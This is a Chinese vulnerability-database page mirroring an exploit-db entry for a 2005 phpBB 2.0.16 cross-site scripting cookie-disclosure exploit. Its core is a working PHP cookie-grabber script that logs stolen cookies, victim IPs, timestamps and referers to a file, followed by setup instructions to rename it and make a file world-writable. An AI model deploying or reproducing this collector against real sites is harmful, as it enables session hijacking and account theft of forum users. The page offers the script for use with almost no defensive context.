phpBB 2.0.16 – Cross-Site Scripting Remote Cookie Disclosure (Cookie Grabber)-安全小百科

phpBB 2.0.16 – Cross-Site Scripting Remote Cookie Disclosure (Cookie Grabber)

漏洞ID	1055249	漏洞类型
发布时间	2005-07-13	更新时间	2005-07-13
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	PHP	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/1103

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

// Original Author: 'Sjaak Rake' Ref: http://www.hackthissite.org/articles/read/175/

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>

//rename it to cookies.php and create one new file steal.php and chmod it to 777

# milw0rm.com [2005-07-13]

相关推荐: Apache 1.3.x < 2.0.48 mod_userdir - Remote Users Disclosure

Apache 1.3.x < 2.0.48 mod_userdir – Remote Users Disclosure 漏洞ID 1054283 漏洞类型发布时间 2003-12-06 更新时间 2003-12-06 CVE编号 N/A CNNVD-I…

文章版权归作者所有，未经允许请勿转载。

THE END